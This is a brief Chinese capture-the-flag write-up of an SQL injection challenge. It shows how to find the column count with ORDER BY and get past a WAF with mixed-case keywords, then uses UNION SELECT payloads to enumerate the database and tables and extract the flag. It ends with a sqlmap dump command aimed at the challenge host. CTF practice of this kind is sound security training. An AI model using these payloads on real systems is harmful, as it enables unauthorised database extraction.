闭合之后尝试判断字段数，存在WAF，使用大小写绕过（后面的sql语句也需要进行大小写绕过）

?id=1' Order by 5--+

测出有5列

?id=1' Order by 6--+

查一下数据库名、版本、用户等信息

?id=1'Union Select database(),version(),user(),4,5 --+

 查出数据库ctf下的表 

?id=0' uNion Select 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA= 'ctf'--+

尝试在表here_is_flag下查找flag

?id=0' uNion Select 1,2,3,4,flag FROM ctf.here_is_flag--+

 flag{e66fd4f6-00ac-4a66-b47e-1af1355d5630}

或者使用sqlmap直接跑出所有库和表内容

sqlmap -u "http://3d75c5bf-0a9e-41fc-bb45-e6877f646556.node4.buuoj.cn:81/?id=1"  --columns --dump